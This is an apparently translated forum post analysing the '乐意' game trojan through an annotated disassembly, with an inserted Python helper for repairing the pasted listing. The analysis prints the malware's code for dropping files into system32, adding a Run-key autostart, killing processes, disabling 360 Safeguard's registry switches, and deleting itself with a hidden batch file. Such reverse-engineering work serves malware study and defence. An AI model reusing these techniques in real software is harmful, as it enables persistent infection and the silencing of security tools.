Disassembling the 乐意木马 (Leyi trojan)
Disassembling the 乐意木马 and building a generator for it took two days. By disassembling the sample I analysed the 乐意 trojan and wrote a trojan generator for it.
While reversing I ran into this string: "Warning: this file is a junk file; apart from a block of genuine-copy verification data it does nothing, and whoever reverses it is an idiot."
Summary. When run, the 乐意 trojan drops one DLL into the system32 directory (the DLL differs per targeted game), and in every variant it also drops an executable named "System.exe". Every 乐意 variant also goes after 360 Safeguard (360安全卫士).
00401000 >55 push ebp ; entry point
00401001 8BEC mov ebp,esp
00401003 81C4 6CFDFFFF add esp,-294
00401009 6A 00 push 0
0040100B E8 90090000 call 乐意梦幻.004019A0 ; import thunk (the name did not survive the paste); the result is kept in [ebp-260] and later passed as the module handle to the resource-dropping routine, which with the push 0 points to GetModuleHandleA(NULL)
00401010 8985 A0FDFFFF mov dword ptr ss:[ebp-260],eax
00401016 68 A0000000 push 0A0
0040101B 68 00304000 push 乐意梦幻.00403000
00401020 68 00304000 push 乐意梦幻.00403000
00401025 E8 E8030000 call 乐意梦幻.00401412 ; routine not shown; 00403000 is the buffer compared against process names at 0040189D
0040102A E8 29080000 call 乐意梦幻.00401858 ; kill any process whose name matches the string at 00403000 (routine below)
=========== call 乐意梦幻.00401858 leads to the following =======================
00401858 55 push ebp
00401859 8BEC mov ebp,esp
0040185B 81C4 D0FEFFFF add esp,-130
00401861 6A 00 push 0
00401863 6A 02 push 2 ; TH32CS_SNAPPROCESS
00401865 E8 12010000 call <jmp.&KERNEL32.CreateToolhelp32Snapshot> ; process snapshot
0040186A 0BC0 or eax,eax
0040186C 0F84 8B000000 je 乐意梦幻.004018FD
00401872 8985 D4FEFFFF mov dword ptr ss:[ebp-12C],eax ; snapshot handle
00401878 C785 D8FEFFFF 280>mov dword ptr ss:[ebp-128],128 ; PROCESSENTRY32.dwSize
00401882 8D85 D8FEFFFF lea eax,dword ptr ss:[ebp-128]
00401888 50 push eax
00401889 FFB5 D4FEFFFF push dword ptr ss:[ebp-12C]
0040188F E8 5A010000 call <jmp.&KERNEL32.Process32First> ; fill the PROCESSENTRY32 for the first process (no handle is returned here)
00401894 EB 58 jmp short 乐意梦幻.004018EE
00401896 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104] ; PROCESSENTRY32.szExeFile
0040189C 50 push eax
0040189D 68 00304000 push 乐意梦幻.00403000 ; ASCII "my.exe"
004018A2 E8 80FFFFFF call 乐意梦幻.00401827 ; name comparison
004018A7 0BC0 or eax,eax
004018A9 74 31 je short 乐意梦幻.004018DC
004018AB FFB5 E0FEFFFF push dword ptr ss:[ebp-120] ; PROCESSENTRY32.th32ProcessID
004018B1 6A 00 push 0
004018B3 6A 01 push 1 ; PROCESS_TERMINATE
004018B5 E8 2E010000 call <jmp.&KERNEL32.OpenProcess>
004018BA 0BC0 or eax,eax
004018BC 74 1E je short 乐意梦幻.004018DC
004018BE 8985 D0FEFFFF mov dword ptr ss:[ebp-130],eax
004018C4 6A 00 push 0
004018C6 FFB5 D0FEFFFF push dword ptr ss:[ebp-130]
004018CC E8 2F010000 call <jmp.&KERNEL32.TerminateProcess>
004018D1 FFB5 D0FEFFFF push dword ptr ss:[ebp-130]
004018D7 E8 8E000000 call <jmp.&KERNEL32.CloseHandle>
004018DC 8D85 D8FEFFFF lea eax,dword ptr ss:[ebp-128]
004018E2 50 push eax
004018E3 FFB5 D4FEFFFF push dword ptr ss:[ebp-12C]
004018E9 E8 06010000 call <jmp.&KERNEL32.Process32Next>
004018EE 0BC0 or eax,eax
004018F0^ 75 A4 jnz short 乐意梦幻.00401896 ; loop over every process in the snapshot
004018F2 FFB5 D4FEFFFF push dword ptr ss:[ebp-12C]
004018F8 E8 6D000000 call <jmp.&KERNEL32.CloseHandle>
004018FD C9 leave
004018FE C3 retn
======================================================
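The pasted listing lost every bracketed memory operand (the forum software swallowed the `[ebp-...]` text, leaving `dword ptr ss:,eax`), but the displacement is still in the opcode column. As an added example that is not part of the original post, the decoder below recovers the operand for the handful of ebp-relative encodings this listing uses; it handles only those forms and leaves any line it cannot decode (such as the truncated `280>` lines) unchanged.

```python
"""Recover the [ebp+disp] memory operands the forum paste dropped.

Added example for reading the listing above, not code from the original post.
Handles only the encodings that occur there:
  89 /r mov r/m32,r32    8B /r mov r32,r/m32     8D /r lea r32,m
  FF /6 push r/m32       C7 /0 mov r/m32,imm32   83 /4 and r/m32,imm8
with ModRM mod=01 (disp8) or mod=10 (disp32) and base ebp (rm=101).
"""
import re
import struct

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# address, optional OllyDbg backward-jump marker '^', opcode bytes, instruction text
LINE_RE = re.compile(r"^([0-9A-F]{8})(\^?)\s+((?:[0-9A-F]{2,8}\s)+)(.*)$")


def _operand(disp: int) -> str:
    """OllyDbg spelling: dword ptr ss:[ebp-260], dword ptr ss:[ebp+C]."""
    return "dword ptr ss:[ebp%s%X]" % ("-" if disp < 0 else "+", abs(disp))


def decode_ebp_operand(hexbytes: str) -> str:
    """hexbytes is the opcode column as pasted, e.g. '8985 A0FDFFFF'."""
    code = bytes.fromhex(hexbytes.replace(" ", ""))
    if len(code) < 3:
        raise ValueError("too short: " + hexbytes)
    op, modrm = code[0], code[1]
    mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
    if rm != 5 or mod not in (1, 2):
        raise ValueError("not an [ebp+disp] operand: " + hexbytes)
    if mod == 1:                                   # disp8, sign-extended
        disp, rest = struct.unpack("<b", code[2:3])[0], code[3:]
    else:                                          # disp32
        if len(code) < 6:
            raise ValueError("disp32 missing: " + hexbytes)
        disp, rest = struct.unpack("<i", code[2:6])[0], code[6:]
    mem = _operand(disp)
    if op == 0x89:
        return "mov %s,%s" % (mem, REG32[reg])
    if op == 0x8B:
        return "mov %s,%s" % (REG32[reg], mem)
    if op == 0x8D:
        return "lea %s,%s" % (REG32[reg], mem)
    if op == 0xFF and reg == 6:
        return "push %s" % mem
    if op == 0xC7 and reg == 0:
        if len(rest) < 4:                          # e.g. the truncated '280>' lines
            raise ValueError("imm32 missing: " + hexbytes)
        return "mov %s,%X" % (mem, struct.unpack("<I", rest[:4])[0])
    if op == 0x83 and reg == 4:
        if len(rest) < 1:
            raise ValueError("imm8 missing: " + hexbytes)
        imm = struct.unpack("<b", rest[:1])[0] & 0xFFFFFFFF
        return "and %s,%X" % (mem, imm)
    raise ValueError("opcode %02X /%d not handled" % (op, reg))


def repair_line(line: str) -> str:
    """Rebuild one pasted listing line whose 'ss:' operand lost its brackets.
    Lines that need no repair, or that cannot be decoded, come back as-is."""
    m = LINE_RE.match(line.strip())
    if not m or "ss:" not in m.group(4) or "[" in m.group(4):
        return line
    addr, caret, hexcol, _ = m.groups()
    try:
        return "%s%s %s%s" % (addr, caret, hexcol, decode_ebp_operand(hexcol))
    except ValueError:
        return line


if __name__ == "__main__":
    for pasted in ("00401010 8985 A0FDFFFF mov dword ptr ss:,eax",
                   "00401889 FFB5 D4FEFFFF push dword ptr ss:",
                   "0040167A FF75 0C push dword ptr ss:"):
        print(repair_line(pasted))
```

Feed it the pasted lines one at a time; anything with a `ds:` operand, a register-only form, or a cut-off immediate is returned untouched, so you can run it over the whole listing without damaging the lines that were already fine.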
0040102F 68 04010000 push 104 ; MAX_PATH
00401034 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
0040103A 50 push eax
0040103B E8 72090000 call <jmp.&KERNEL32.GetSystemDirectoryA> ; get the system directory; HBmhly.dll and System.exe are dropped into it
00401040 68 BC204000 push 乐意梦幻.004020BC ; ASCII "\"
00401045 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104] ; EAX=C:\WINDOWS\system32
0040104B 50 push eax
0040104C E8 C1090000 call 乐意梦幻.00401A12 ; same thunk as <jmp.&KERNEL32.lstrcatA> at 00401518 below
00401051 68 B8314000 push 乐意梦幻.004031B8 ; ASCII "HBmhly.dll"
00401056 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
0040105C 50 push eax
0040105D E8 B0090000 call 乐意梦幻.00401A12 ; lstrcatA
00401062 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
00401068 50 push eax ; eax=0012FEBC, (ASCII "C:\WINDOWS\system32\HBmhly.dll")
00401069 6A 66 push 66 ; resource id
0040106B 6A 0A push 0A ; resource type 0A = RT_RCDATA
0040106D FFB5 A0FDFFFF push dword ptr ss:[ebp-260] ; module handle
00401073 E8 09020000 call 乐意梦幻.00401281 ; write resource 66 out as the dll
00401078 0BC0 or eax,eax
0040107A 0F85 D8000000 jnz 乐意梦幻.00401158 ; dropped: go straight to the mutex check
00401080 68 04010000 push 104 ; drop failed: retry through a temporary file name in the system directory
00401085 8D85 F8FDFFFF lea eax,dword ptr ss:[ebp-208]
0040108B 50 push eax
0040108C E8 21090000 call 乐意梦幻.004019B2 ; GetSystemDirectoryA (same thunk as at 0040103B)
00401091 8D85 F8FDFFFF lea eax,dword ptr ss:[ebp-208]
00401097 50 push eax
00401098 6A 00 push 0
0040109A 6A 00 push 0
0040109C 8D85 F8FDFFFF lea eax,dword ptr ss:[ebp-208]
004010A2 50 push eax
004010A3 E8 10090000 call 乐意梦幻.004019B8 ; get a temporary file name inside the system directory (import name lost in the paste)
004010A8 8D85 F8FDFFFF lea eax,dword ptr ss:[ebp-208]
004010AE 50 push eax
004010AF E8 CE080000 call 乐意梦幻.00401982
004010B4 8D85 F8FDFFFF lea eax,dword ptr ss:[ebp-208]
004010BA 50 push eax
004010BB 6A 20 push 20
004010BD 8D85 6CFDFFFF lea eax,dword ptr ss:[ebp-294]
004010C3 50 push eax
004010C4 E8 AD050000 call 乐意梦幻.00401676 ; copy the file-name part of the temp path into [ebp-294] (routine listed below)
004010C9 8D85 6CFDFFFF lea eax,dword ptr ss:[ebp-294]
004010CF 50 push eax
004010D0 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
004010D6 50 push eax
004010D7 E8 FD010000 call 乐意梦幻.004012D9
004010DC 6A 04 push 4
004010DE 6A 00 push 0
004010E0 8D85 F8FDFFFF lea eax,dword ptr ss:[ebp-208]
004010E6 50 push eax
004010E7 E8 F0080000 call 乐意梦幻.004019DC ; three arguments (temp path, 0, 4); import name lost in the paste
004010EC 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
004010F2 50 push eax
004010F3 6A 66 push 66
004010F5 6A 0A push 0A
004010F7 FFB5 A0FDFFFF push dword ptr ss:[ebp-260]
004010FD E8 7F010000 call 乐意梦幻.00401281 ; second attempt to drop HBmhly.dll
00401102 0BC0 or eax,eax
00401104 74 52 je short 乐意梦幻.00401158
00401106 68 BE204000 push 乐意梦幻.004020BE ; ASCII "HBInject32"
0040110B 6A 00 push 0
0040110D E8 1E090000 call 乐意梦幻.00401A30 ; look up the already-running injector by the name "HBInject32"
00401112 0BC0 or eax,eax
00401114 74 42 je short 乐意梦幻.00401158
00401116 8985 9CFDFFFF mov dword ptr ss:[ebp-264],eax
0040111C C785 90FDFFFF 00>mov dword ptr ss:[ebp-270],0
00401126 68 B8314000 push 乐意梦幻.004031B8 ; ASCII "HBmhly.dll"
0040112B E8 F4080000 call 乐意梦幻.00401A24 ; lstrlenA (same thunk as <jmp.&KERNEL32.lstrlenA> at 0040162E below)
00401130 8985 94FDFFFF mov dword ptr ss:[ebp-26C],eax
00401136 8D05 B8314000 lea eax,dword ptr ds:[4031B8]
0040113C 8985 98FDFFFF mov dword ptr ss:[ebp-268],eax
00401142 8D85 90FDFFFF lea eax,dword ptr ss:[ebp-270] ; {0, lstrlen("HBmhly.dll"), "HBmhly.dll"}: the layout of a COPYDATASTRUCT
00401148 50 push eax
00401149 6A 00 push 0
0040114B 6A 4A push 4A ; 4A = WM_COPYDATA
0040114D FFB5 9CFDFFFF push dword ptr ss:[ebp-264]
00401153 E8 E4080000 call 乐意梦幻.00401A3C ; hands the dll name to the "HBInject32" window; the import names are gone from the paste, but the arguments match FindWindowA + SendMessageA(WM_COPYDATA)
00401158 68 C9204000 push 乐意梦幻.004020C9 ; ASCII "HBInjectMutex"
0040115D 6A 00 push 0
0040115F 68 03001F00 push 1F0003 ; MUTEX_ALL_ACCESS
00401164 E8 79080000 call 乐意梦幻.004019E2 ; argument order matches OpenMutexA: if the mutex exists, System.exe is already running
00401169 0BC0 or eax,eax
0040116B 0F85 A4000000 jnz 乐意梦幻.00401215
00401171 E8 1E080000 call 乐意梦幻.00401994
00401176 83F8 02 cmp eax,2
00401179 0F85 9C000000 jnz 乐意梦幻.0040121B
0040117F 68 04010000 push 104
00401184 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
0040118A 50 push eax
0040118B E8 22080000 call 乐意梦幻.004019B2 ; GetSystemDirectoryA
00401190 68 D7204000 push 乐意梦幻.004020D7 ; ASCII "\System.exe" (the string occupies 004020D7-004020E2, so it carries the leading backslash the paste dropped)
00401195 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
0040119B 50 push eax
0040119C E8 71080000 call 乐意梦幻.00401A12 ; lstrcatA
004011A1 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
004011A7 50 push eax
004011A8 6A 65 push 65 ; resource id
004011AA 6A 0A push 0A ; RT_RCDATA
004011AC FFB5 A0FDFFFF push dword ptr ss:[ebp-260]
004011B2 E8 CA000000 call 乐意梦幻.00401281 ; write resource 65 out as System.exe
004011B7 0BC0 or eax,eax
004011B9 74 58 je short 乐意梦幻.00401213
004011BB C785 B4FDFFFF 44>mov dword ptr ss:[ebp-24C],44 ; STARTUPINFO.cb
004011C5 8D85 B4FDFFFF lea eax,dword ptr ss:[ebp-24C]
004011CB 50 push eax
004011CC E8 DB070000 call <jmp.&KERNEL32.GetStartupInfoA>
004011D1 8D85 A4FDFFFF lea eax,dword ptr ss:[ebp-25C] ; PROCESS_INFORMATION
004011D7 50 push eax
004011D8 8D85 B4FDFFFF lea eax,dword ptr ss:[ebp-24C]
004011DE 50 push eax
004011DF 6A 00 push 0
004011E1 6A 00 push 0
004011E3 6A 00 push 0
004011E5 6A 00 push 0
004011E7 6A 00 push 0
004011E9 6A 00 push 0
004011EB 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
004011F1 50 push eax
004011F2 6A 00 push 0
004011F4 E8 7D070000 call <jmp.&KERNEL32.CreateProcessA> ; start System.exe
004011F9 0BC0 or eax,eax
004011FB 74 16 je short 乐意梦幻.00401213
004011FD FFB5 A4FDFFFF push dword ptr ss:[ebp-25C] ; hProcess
00401203 E8 62070000 call 乐意梦幻.0040196A ; CloseHandle (same thunk as at 0040120E)
00401208 FFB5 A8FDFFFF push dword ptr ss:[ebp-258] ; hThread
0040120E E8 57070000 call <jmp.&KERNEL32.CloseHandle>
00401213 EB 06 jmp short 乐意梦幻.0040121B
00401215 50 push eax
00401216 E8 4F070000 call <jmp.&KERNEL32.CloseHandle> ; mutex handle
0040121B 6A 00 push 0 ; from here on: set up the autostart
0040121D 68 E3204000 push 乐意梦幻.004020E3 ; ASCII "AskTao"
00401222 E8 12020000 call 乐意梦幻.00401439
00401227 E8 9F040000 call 乐意梦幻.004016CB ; cripple 360 Safeguard (routine listed below)
0040122C 8D85 8CFDFFFF lea eax,dword ptr ss:[ebp-274]
00401232 50 push eax
00401233 68 3F000F00 push 0F003F ; KEY_ALL_ACCESS
00401238 6A 00 push 0
0040123A 68 EA204000 push 乐意梦幻.004020EA ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0040123F 68 02000080 push 80000002 ; HKEY_LOCAL_MACHINE
00401244 E8 05080000 call <jmp.&ADVAPI32.RegOpenKeyExA>
00401249 0BC0 or eax,eax
0040124B 75 26 jnz short 乐意梦幻.00401273
0040124D 6A 0B push 0B ; cbData = 11, "System.exe" plus the terminator
0040124F 68 24214000 push 乐意梦幻.00402124 ; ASCII "System.exe"
00401254 6A 01 push 1 ; REG_SZ
00401256 6A 00 push 0
00401258 68 18214000 push 乐意梦幻.00402118 ; ASCII "HBService32"
0040125D FFB5 8CFDFFFF push dword ptr ss:[ebp-274]
00401263 E8 EC070000 call 乐意梦幻.00401A54 ; RegSetValueExA (same thunk as <jmp.&ADVAPI32.RegSetValueExA> at 00401709 below)
00401268 FFB5 8CFDFFFF push dword ptr ss:[ebp-274]
0040126E E8 CF070000 call <jmp.&ADVAPI32.RegCloseKey> ; autostart written: HKLM\...\Run\HBService32 = "System.exe"; the trojan now starts with Windows
00401273 E8 FE010000 call 乐意梦幻.00401476 ; last step of the dropper: write and run SelfDel.bat (routine listed below)
============ call 乐意梦幻.00401476 leads to the following ========================
00401476 55 push ebp
00401477 8BEC mov ebp,esp
00401479 83C4 E4 add esp,-1C
0040147C EB 4B jmp short 乐意梦幻.004014C9 ; skip over the inline string table below
OllyDbg decoded the bytes from 0040147E to 004014C8 as instructions, which is why the pasted listing showed outs/jo/popad/imul garbage here. They are the NUL-terminated fragments of the batch file, indexed by address from the lstrcatA calls further down, and the real code resumes at 004014C9:
0040147E 6F 70 65 6E 00 ASCII "open"
00401483 5C 00 ASCII "\"
00401485 3A 52 65 70 65 61 74 0D 0A 00 ASCII ":Repeat\r\n"
0040148F 64 65 6C 20 22 00 ASCII "del \""
00401495 22 00 ASCII "\""
00401497 0D 0A 69 66 20 65 78 69 73 74 20 22 00 ASCII "\r\nif exist \""
004014A4 22 20 67 6F 74 6F 20 52 65 70 65 61 74 0D 0A 00 ASCII "\" goto Repeat\r\n"
004014B4 72 6D 64 69 72 20 22 00 ASCII "rmdir \""
004014BC 22 0D 0A 64 65 6C 20 22 00 ASCII "\"\r\ndel \""
004014C5 22 0D 0A 00 ASCII "\"\r\n"
004014C9 E8 D8040000 call 乐意梦幻.004019A6 ; result is used as the heap handle in HeapAlloc/HeapFree below, i.e. GetProcessHeap
004014CE 8945 F4 mov dword ptr ss:[ebp-C],eax
004014D1 68 F8070000 push 7F8 ; 2040 bytes
004014D6 6A 08 push 8 ; HEAP_ZERO_MEMORY
004014D8 FF75 F4 push dword ptr ss:[ebp-C]
004014DB E8 E4040000 call <jmp.&KERNEL32.HeapAlloc>
004014E0 8945 EC mov dword ptr ss:[ebp-14],eax ; the block is carved into 104-byte (MAX_PATH) slots
004014E3 05 04010000 add eax,104
004014E8 8945 EC mov dword ptr ss:[ebp-14],eax ; [ebp-14]: directory of the dropper exe (the allocation base is overwritten here)
004014EB 05 04010000 add eax,104
004014F0 8945 F0 mov dword ptr ss:[ebp-10],eax ; [ebp-10]: full path of the dropper exe
004014F3 05 04010000 add eax,104
004014F8 8945 E8 mov dword ptr ss:[ebp-18],eax ; [ebp-18]: path of SelfDel.bat
004014FB 05 04010000 add eax,104
00401500 8945 E4 mov dword ptr ss:[ebp-1C],eax ; [ebp-1C]: the batch text being built
00401503 FF75 E8 push dword ptr ss:[ebp-18]
00401506 68 04010000 push 104
0040150B E8 AE040000 call <jmp.&KERNEL32.GetTempPathA> ; a batch file SelfDel.bat is created in the temp directory to delete the dropper
00401510 68 41214000 push 乐意梦幻.00402141 ; ASCII "SelfDel.bat"
00401515 FF75 E8 push dword ptr ss:[ebp-18]
00401518 E8 F5040000 call <jmp.&KERNEL32.lstrcatA>
0040151D 6A 00 push 0
0040151F 68 80000008 push 8000080 ; FILE_FLAG_SEQUENTIAL_SCAN | FILE_ATTRIBUTE_NORMAL
00401524 6A 02 push 2 ; CREATE_ALWAYS
00401526 6A 00 push 0
00401528 6A 00 push 0
0040152A 68 00000040 push 40000000 ; GENERIC_WRITE
0040152F FF75 E8 push dword ptr ss:[ebp-18]
00401532 E8 39040000 call <jmp.&KERNEL32.CreateFileA>
00401537 8945 FC mov dword ptr ss:[ebp-4],eax
0040153A 837D FC FF cmp dword ptr ss:[ebp-4],-1 ; INVALID_HANDLE_VALUE
0040153E 0F84 23010000 je 乐意梦幻.00401667
00401544 68 04010000 push 104
00401549 FF75 F0 push dword ptr ss:[ebp-10]
0040154C 6A 00 push 0
0040154E E8 47040000 call <jmp.&KERNEL32.GetModuleFileNameA> ; full path of the file to delete (the running dropper itself)
00401553 FF75 F0 push dword ptr ss:[ebp-10]
00401556 FF75 EC push dword ptr ss:[ebp-14]
00401559 E8 C0040000 call <jmp.&KERNEL32.lstrcpyA> ; the copy in [ebp-14] is cut down to the directory below
0040155E B8 5E154000 mov eax,乐意梦幻.0040155E ; anti-disassembly: eax never equals 00401563, so the je is never taken
00401563 3D 63154000 cmp eax,乐意梦幻.00401563
00401568 74 07 je short 乐意梦幻.00401571
0040156A B8 81154000 mov eax,乐意梦幻.00401581
0040156F FFE0 jmp eax ; real code continues at 00401581
00401571 48 65 6C 6C 6F 20 4B 61 73 70 65 72 73 6B 79 00 ASCII "Hello Kaspersky" ; dead bytes that a linear disassembler decodes as code
00401581 8B55 EC mov edx,dword ptr ss:[ebp-14]
00401584 8BCA mov ecx,edx
00401586 8A02 mov al,byte ptr ds:[edx]
00401588 3C 5C cmp al,5C ; '\'
0040158A 75 02 jnz short 乐意梦幻.0040158E
0040158C 8BCA mov ecx,edx ; ecx = position of the last backslash seen so far
0040158E 42 inc edx
0040158F 0AC0 or al,al
00401591^ 75 F3 jnz short 乐意梦幻.00401586
00401593 C641 01 00 mov byte ptr ds:[ecx+1],0 ; truncate after the last backslash: [ebp-14] is now the directory, trailing "\" included
00401597 68 85144000 push 乐意梦幻.00401485 ; ASCII ":Repeat\r\n"
0040159C FF75 E4 push dword ptr ss:[ebp-1C]
0040159F E8 6E040000 call <jmp.&KERNEL32.lstrcatA>
004015A4 68 8F144000 push 乐意梦幻.0040148F ; ASCII "del \""
004015A9 FF75 E4 push dword ptr ss:[ebp-1C]
004015AC E8 61040000 call <jmp.&KERNEL32.lstrcatA>
004015B1 FF75 F0 push dword ptr ss:[ebp-10] ; dropper path
004015B4 FF75 E4 push dword ptr ss:[ebp-1C]
004015B7 E8 56040000 call <jmp.&KERNEL32.lstrcatA>
004015BC 68 95144000 push 乐意梦幻.00401495 ; ASCII "\""
004015C1 FF75 E4 push dword pt ss:[ebp-1C]
004015C4 E8 49040000 call <jmp.&KERNEL32.lstrcatA>
004015C9 68 97144000 push 乐意梦幻.00401497 ; ASCII "\r\nif exist \""
004015CE FF75 E4 push dword ptr ss:[ebp-1C]
004015D1 E8 3C040000 call <jmp.&KERNEL32.lstrcatA>
004015D6 FF75 F0 push dword ptr ss:[ebp-10] ; dropper path
004015D9 FF75 E4 push dword ptr ss:[ebp-1C]
004015DC E8 31040000 call <jmp.&KERNEL32.lstrcatA>
004015E1 68 A4144000 push 乐意梦幻.004014A4 ; ASCII "\" goto Repeat\r\n"
004015E6 FF75 E4 push dword ptr ss:[ebp-1C]
004015E9 E8 24040000 call <jmp.&KERNEL32.lstrcatA>
004015EE 68 B4144000 push 乐意梦幻.004014B4 ; ASCII "rmdir \""
004015F3 FF75 E4 push dword ptr ss:[ebp-1C]
004015F6 E8 17040000 call <jmp.&KERNEL32.lstrcatA>
004015FB FF75 EC push dword ptr ss:[ebp-14] ; dropper directory
004015FE FF75 E4 push dword ptr ss:[ebp-1C]
00401601 E8 0C040000 call <jmp.&KERNEL32.lstrcatA>
00401606 68 BC144000 push 乐意梦幻.004014BC ; ASCII "\"\r\ndel \""
0040160B FF75 E4 push dword ptr ss:[ebp-1C]
0040160E E8 FF030000 call <jmp.&KERNEL32.lstrcatA>
00401613 FF75 E8 push dword ptr ss:[ebp-18] ; SelfDel.bat path
00401616 FF75 E4 push dword ptr ss:[ebp-1C]
00401619 E8 F4030000 call <jmp.&KERNEL32.lstrcatA>
0040161E 68 C5144000 push 乐意梦幻.004014C5 ; ASCII "\"\r\n"
00401623 FF75 E4 push dword ptr ss:[ebp-1C]
00401626 E8 E7030000 call <jmp.&KERNEL32.lstrcatA>
0040162B FF75 E4 push dword ptr ss:[ebp-1C]
0040162E E8 F1030000 call <jmp.&KERNEL32.lstrlenA>
00401633 8945 F8 mov dword ptr ss:[ebp-8],eax
00401636 6A 00 push 0
00401638 8D45 F8 lea eax,dword ptr ss:[ebp-8] ; lpNumberOfBytesWritten reuses the length slot
0040163B 50 push eax
0040163C FF75 F8 push dword ptr ss:[ebp-8]
0040163F FF75 E4 push dword ptr ss:[ebp-1C]
00401642 FF75 FC push dword ptr ss:[ebp-4]
00401645 E8 C2030000 call <jmp.&KERNEL32.WriteFile>
0040164A FF75 FC push dword ptr ss:[ebp-4]
0040164D E8 18030000 call <jmp.&KERNEL32.CloseHandle>
00401652 6A 00 push 0 ; SW_HIDE
00401654 6A 00 push 0
00401656 6A 00 push 0
00401658 FF75 E8 push dword ptr ss:[ebp-18]
0040165B 68 4D214000 push 乐意梦幻.0040214D ; ASCII "open"
00401660 6A 00 push 0
00401662 E8 F3030000 call <jmp.&SHELL32.ShellExecuteA> ; run SelfDel.bat in a hidden window
00401667 FF75 EC push dword ptr ss:[ebp-14] ; no longer the allocation base (overwritten at 004014E8), so this HeapFree gets an interior pointer and fails; harmless for a process about to exit
0040166A 6A 00 push 0
0040166C FF75 F4 push dword ptr ss:[ebp-C]
0040166F E8 56030000 call <jmp.&KERNEL32.HeapFree>
00401674 C9 leave
00401675 C3 retn
00401676 55 push ebp ; basename routine: dst=[ebp+8], size=[ebp+C], src=[ebp+10]; copies the part of src after the last "\"
00401677 8BEC mov ebp,esp
00401679 57 push edi
0040167A FF75 0C push dword ptr ss:[ebp+C]
0040167D FF75 08 push dword ptr ss:[ebp+8]
00401680 E8 DF020000 call <jmp.&NTDLL.RtlZeroMemory>
00401685 FF75 10 push dword ptr ss:[ebp+10]
00401688 E8 97030000 call <jmp.&KERNEL32.lstrlenA>
0040168D 48 dec eax ; index of the last character
0040168E EB 1B jmp short 乐意梦幻.004016AB
00401690 8B7D 10 mov edi,dword ptr ss:[ebp+10]
00401693 8A1C38 mov bl,byte ptr ds:[eax+edi]
00401696 80FB 5C cmp bl,5C ; '\'
00401699 75 0F jnz short 乐意梦幻.004016AA
0040169B 0345 10 add eax,dword ptr ss:[ebp+10]
0040169E 40 inc eax ; pointer just past the backslash
0040169F 50 push eax
004016A0 FF75 08 push dword ptr ss:[ebp+8]
004016A3 E8 76030000 call <jmp.&KERNEL32.lstrcpyA>
004016A8 EB 05 jmp short 乐意梦幻.004016AF
004016AA 48 dec eax
004016AB 0BC0 or eax,eax
004016AD^ 75 E1 jnz short 乐意梦幻.00401690 ; scan backwards; index 0 is never examined
004016AF FF75 08 push dword ptr ss:[ebp+8]
004016B2 E8 6D030000 call <jmp.&KERNEL32.lstrlenA>
004016B7 0BC0 or eax,eax
004016B9 75 0B jnz short 乐意梦幻.004016C6
004016BB FF75 10 push dword ptr ss:[ebp+10]
004016BE FF75 08 push dword ptr ss:[ebp+8]
004016C1 E8 58030000 call <jmp.&KERNEL32.lstrcpyA> ; no backslash found: copy src unchanged
004016C6 5F pop edi
004016C7 C9 leave
004016C8 C2 0C00 retn 0C
004016CB 55 push ebp ; cripple 360 Safeguard: zero its safemon switches and remove its autostart entries
004016CC 8BEC mov ebp,esp
004016CE 83C4 F8 add esp,-8
004016D1 8D45 FC lea eax,dword ptr ss:[ebp-4]
004016D4 50 push eax
004016D5 68 3F000F00 push 0F003F ; KEY_ALL_ACCESS
004016DA 6A 00 push 0
004016DC 68 52214000 push 乐意梦幻.00402152 ; ASCII "Software\360Safe\safemon"
004016E1 68 02000080 push 80000002 ; HKEY_LOCAL_MACHINE
004016E6 E8 63030000 call <jmp.&ADVAPI32.RegOpenKeyExA>
004016EB 0BC0 or eax,eax
004016ED 0F85 F2000000 jnz 乐意梦幻.004017E5
004016F3 8365 F8 00 and dword ptr ss:[ebp-8],0 ; the DWORD 0 written to every value below
004016F7 6A 04 push 4 ; cbData
004016F9 8D45 F8 lea eax,dword ptr ss:[ebp-8]
004016FC 50 push eax
004016FD 6A 04 push 4 ; REG_DWORD
004016FF 6A 00 push 0
00401701 68 6B214000 push 乐意梦幻.0040216B ; ASCII "ARPAccess"
00401706 FF75 FC push dword ptr ss:[ebp-4]
00401709 E8 46030000 call <jmp.&ADVAPI32.RegSetValueExA>
0040170E 6A 04 push 4
00401710 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401713 50 push eax
00401714 6A 04 push 4
00401716 6A 00 push 0
00401718 68 75214000 push 乐意梦幻.00402175 ; ASCII "ExecAccess"
0040171D FF75 FC push dword ptr ss:[ebp-4]
00401720 E8 2F030000 call <jmp.&ADVAPI32.RegSetValueExA>
00401725 6A 04 push 4
00401727 8D45 F8 lea eax,dword ptr ss:[ebp-8]
0040172A 50 push eax
0040172B 6A 04 push 4
0040172D 6A 00 push 0
0040172F 68 80214000 push 乐意梦幻.00402180 ; ASCII "IEProtAccess"
00401734 FF75 FC push dword ptr ss:[ebp-4]
00401737 E8 18030000 call <jmp.&ADVAPI32.RegSetValueExA>
0040173C 6A 04 push 4
0040173E 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401741 50 push eax
00401742 6A 04 push 4
00401744 6A 00 push 0
00401746 68 8D214000 push 乐意梦幻.0040218D ; ASCII "LeakShowed"
0040174B FF75 FC push dword ptr ss:[ebp-4]
0040174E E8 01030000 call <jmp.&ADVAPI32.RegSetValueExA>
00401753 6A 04 push 4
00401755 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401758 50 push eax
00401759 6A 04 push 4
0040175B 6A 00 push 0
0040175D 68 98214000 push 乐意梦幻.00402198 ; ASCII "MonAccess"
00401762 FF75 FC push dword ptr ss:[ebp-4]
00401765 E8 EA020000 call <jmp.&ADVAPI32.RegSetValueExA>
0040176A 6A 04 push 4
0040176C 8D45 F8 lea eax,dword ptr ss:[ebp-8]
0040176F 50 push eax
00401770 6A 04 push 4
00401772 6A 00 push 0
